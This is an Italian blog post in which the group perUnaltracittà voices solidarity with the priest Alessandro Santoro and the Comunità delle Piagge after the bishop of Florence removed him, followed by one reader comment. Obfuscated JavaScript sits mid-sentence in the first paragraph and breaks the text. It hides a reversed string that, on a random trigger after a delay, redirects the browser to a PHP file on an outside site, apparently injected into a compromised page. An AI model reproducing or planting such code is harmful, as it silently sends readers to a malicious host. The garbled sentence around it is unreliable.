La solidarietà di perUnaltracittà: "Vicini al prete Alessandro. Vicini alla Comunità delle Piagge"

image_pdfimage_print

“Le donne e gli uomini di perUnaltracittà sono vicini ad Alessadro Santoro, prete alle Piagge, e a tutti e tutte coloro che animano la Comunità di via Lombardia. E non potrebbe essere altrimenti. perUnaltracittà fonda la sua opera avendo ben chiaro che cosa significa diritto di eguaglianza tra le persone e si batte da sempre per il rispetto e l’estensione dei diritti di genere.” Lo ha detto Ornella De Zordo comment (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando la revoca di Santoro dalla “guida pastorale” della Comunità delle Piagge comunicata oggi con una semplice nota stampa dal vescovo di Firenze Giuseppe Betori.

“Siamo solidali con Alessandro e con la Comunità delle Piagge. Da quindici anni sono un esempio straordinario di come stare dalla parte degli ultimi. Dal 1994 vivono quotidiamente a stretto contatto con i volti e i nomi degli esclusi dal perbenismo che aleggia in città. Alessandro Santoro, e le tante persone che con lui si impegnano per costruire una società migliore, hanno da sempre il coraggio di sperimentare soluzioni innovative per risolvere vicende e problemi che nessuno sa più nemmeno come affrontare. Forse, viene il sospetto, troppo scomode per le gerarchie della nostra società. Basti pensare, e citiamo solo questa, all’esperienza del microcredito, un progetto nato al centro sociale Il Pozzo quasi dieci anni fa con l’umiltà di partire da zero, e oggi capace di offrire un’altra opportunità a centinaia di persone senza garanzie, escluse dal diritto al credito dal sistema delle banche.”

0 Comments

  1. Claudia casoni

    30 anni di vita insieme e di amore sono già benedetti. Questa Chiesa che considera solo l’involucro e non vede le persone dentro proprio non la capisco.

    Reply

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *